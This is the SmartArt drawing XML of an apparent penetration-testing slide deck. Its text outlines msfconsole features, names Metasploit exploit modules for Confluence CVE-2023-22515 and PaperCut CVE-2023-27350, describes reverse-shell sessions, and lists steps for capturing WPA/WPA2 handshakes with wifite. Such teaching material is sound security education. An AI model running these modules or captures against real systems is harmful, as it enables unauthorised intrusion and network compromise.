    <dsp:sp modelId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1301738"/>
          <a:ext cx="8150086" cy="3440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b="1" kern="1200"/>
            <a:t>Key Features of msfconsole:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="1318532"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1671693"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🔍 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Module Search</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Quickly find exploits, payloads, post-exploitation tools, and scanners using search.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="1688487"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2041648"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🛠️ </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Module Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Use use &lt;module&gt;, set &lt;option&gt;, and show options to configure attacks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2058442"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2411603"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🧠 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Database Integration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Integrate with a PostgreSQL database to store data from scans and sessions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2428397"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2710EA5E-C778-574A-BCB9-34036A5F8213}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2781558"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🔄 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Session Management</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Interact with compromised systems using sessions command.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2798352"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05085D1D-68E8-4140-961D-8B4F4F098364}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3151513"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🧩 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Automation Support</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Scripts and resource files (.rc) can automate complex workflows.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3168307"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3521468"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>📊 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Info Gathering</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Run auxiliary modules like scanners or fuzzers to gather information before exploitation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3538262"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3891422"/>
          <a:ext cx="8150086" cy="3440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900" kern="1200"/>
            <a:t>🔐 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: After gaining access, use post modules to gather more data or maintain access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3908216"/>
        <a:ext cx="8116498" cy="3104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6C3B22-071C-4062-AA37-0F35BB040322}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="402941"/>
          <a:ext cx="5728649" cy="100949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626F69-75E1-417B-8A94-3AEB2B76464E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="348628" y="476476"/>
          <a:ext cx="635241" cy="6338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3175B-7DA9-4E40-B363-21852094A784}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1070871" y="4072"/>
          <a:ext cx="4648864" cy="1924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39" tIns="138139" rIns="138139" bIns="13813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CMD -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200" dirty="0"/>
            <a:t>use exploit/multi/http/atlassian_confluence_rce_cve_2023_22515</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1070871" y="4072"/>
        <a:ext cx="4648864" cy="1924569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2164706"/>
          <a:ext cx="5728649" cy="9593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FDCFD-4630-4FD0-9A2B-1E878209E586}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="348628" y="2383776"/>
          <a:ext cx="635241" cy="6338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0190EF-6363-470E-9ED2-DF4166F62C21}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1229470" y="2033961"/>
          <a:ext cx="4342845" cy="1305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39" tIns="138139" rIns="138139" bIns="13813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Metasploit Module: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t>exploit/multi/http/atlassian_confluence_rce_cve_2023_22515</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1229470" y="2033961"/>
        <a:ext cx="4342845" cy="1305252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3818672"/>
          <a:ext cx="5728649" cy="11524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38DB3D-6778-4801-838D-A6117CC9B5DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="348628" y="4077982"/>
          <a:ext cx="635241" cy="6338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57626B-9FFB-4254-8208-06BBE0E0C782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="952843" y="3715102"/>
          <a:ext cx="4394638" cy="1353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39" tIns="138139" rIns="138139" bIns="13813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The exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> module targets a critical </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="1" kern="1200" dirty="0"/>
            <a:t>authentication bypass vulnerability</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> NG and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> MF print management software. This vulnerability is tracked as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="1" kern="1200" dirty="0"/>
            <a:t>CVE-2023-27350</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="952843" y="3715102"/>
        <a:ext cx="4394638" cy="13534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88CBA7-A0C7-B94E-A860-0F32666094B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="90487"/>
          <a:ext cx="1875472" cy="112528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/>
            <a:t>CMD - exploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="90487"/>
          <a:ext cx="1875472" cy="112528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/>
            <a:t>What Happens During This Step?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D04B0008-F16F-6D43-8050-7B977F68C01F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126039" y="90487"/>
          <a:ext cx="1875472" cy="112528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The exploit module sends the crafted request to the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4126039" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1403318"/>
          <a:ext cx="1875472" cy="112528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If the vulnerability is present and everything is set correctly:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="1403318"/>
          <a:ext cx="1875472" cy="112528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The payload gets executed on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126039" y="1403318"/>
          <a:ext cx="1875472" cy="112528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The target connects back to the attacker’s system (reverse shell or Meterpreter session).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4126039" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="2716148"/>
          <a:ext cx="1875472" cy="1125283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A new session is opened if successful.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="2716148"/>
        <a:ext cx="1875472" cy="112528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C46383-24A4-5944-BC31-7DC4586B7778}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2151532" y="871891"/>
          <a:ext cx="4633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354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70860" y="915141"/>
        <a:ext cx="24697" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5498CFF6-39A5-254E-9A2A-42C819D2A98F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5705" y="273323"/>
          <a:ext cx="2147627" cy="12885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236" tIns="110463" rIns="105236" bIns="11046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Step 1: Super user</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5705" y="273323"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0100C1DC-E936-4E40-8082-D5A4C4E830B2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4793114" y="871891"/>
          <a:ext cx="4633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354" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-67869"/>
              <a:satOff val="-582"/>
              <a:lumOff val="-3856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12442" y="915141"/>
        <a:ext cx="24697" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BD8E1E17-CD1F-2E4B-91CE-5FCB5731E5E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2647286" y="273323"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-58173"/>
            <a:satOff val="-499"/>
            <a:lumOff val="-33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236" tIns="110463" rIns="105236" bIns="11046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Open Kali Linux terminal.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2647286" y="273323"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E50C3630-D6A7-DA4C-BEB8-7539E6D9BEC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1079518" y="1560099"/>
          <a:ext cx="5283163" cy="463354"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5283163" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5283163" y="248777"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="248777"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="463354"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-135738"/>
              <a:satOff val="-1163"/>
              <a:lumOff val="-771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88445" y="1789306"/>
        <a:ext cx="265310" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D3BB758F-6169-FF41-A36E-20922ACF89E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5288868" y="273323"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-116347"/>
            <a:satOff val="-997"/>
            <a:lumOff val="-66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236" tIns="110463" rIns="105236" bIns="11046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Command: upgrade.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5288868" y="273323"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1C430CB4-3EFC-644D-A8CF-24230DEC34DD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2151532" y="2654422"/>
          <a:ext cx="4633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354" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-203606"/>
              <a:satOff val="-1745"/>
              <a:lumOff val="-1156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70860" y="2697672"/>
        <a:ext cx="24697" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AC5DAED5-83D4-E74F-8158-F56233BE17CB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5705" y="2055853"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-174520"/>
            <a:satOff val="-1496"/>
            <a:lumOff val="-99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236" tIns="110463" rIns="105236" bIns="11046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Command: sudo su (To enter super user).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5705" y="2055853"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{981AE960-44EB-A54E-BB4A-7242EC928243}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4793114" y="2654422"/>
          <a:ext cx="4633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354" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-271475"/>
              <a:satOff val="-2327"/>
              <a:lumOff val="-1542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12442" y="2697672"/>
        <a:ext cx="24697" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0B55845F-BEF7-104F-8CD4-C229B0697BF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2647286" y="2055853"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-232693"/>
            <a:satOff val="-1994"/>
            <a:lumOff val="-132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236" tIns="110463" rIns="105236" bIns="11046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Step 2: Wifite</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2647286" y="2055853"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9D6A0F6-4889-6A45-990C-0E39F9A11B49}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1079518" y="3342630"/>
          <a:ext cx="5283163" cy="463354"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5283163" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5283163" y="248777"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="248777"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="463354"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-339344"/>
              <a:satOff val="-2908"/>
              <a:lumOff val="-1928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88445" y="3571837"/>
        <a:ext cx="265310" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C7434790-D7E9-8444-9B06-F89526A28B96}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5288868" y="2055853"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-290866"/>
            <a:satOff val="-2493"/>
            <a:lumOff val="-165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236" tIns="110463" rIns="105236" bIns="11046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After entering the super user.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5288868" y="2055853"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{475506ED-F649-FB4E-B8BA-B7600C18EBA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2151532" y="4436952"/>
          <a:ext cx="4633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3354" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="-407213"/>
              <a:satOff val="-3490"/>
              <a:lumOff val="-2313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70860" y="4480202"/>
        <a:ext cx="24697" cy="4939"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E50D64C6-BBF9-964F-AEA3-CB268D4E18FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5705" y="3838384"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-349040"/>
            <a:satOff val="-2991"/>
            <a:lumOff val="-198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236" tIns="110463" rIns="105236" bIns="11046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Command:wifite</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5705" y="3838384"/>
        <a:ext cx="2147627" cy="1288576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29683069-108C-424A-BD53-CD1E24E46F27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2647286" y="3838384"/>
          <a:ext cx="2147627" cy="1288576"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-407213"/>
            <a:satOff val="-3490"/>
            <a:lumOff val="-2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236" tIns="110463" rIns="105236" bIns="110463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To capture WPA/WPA2 handshake. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2647286" y="3838384"/>
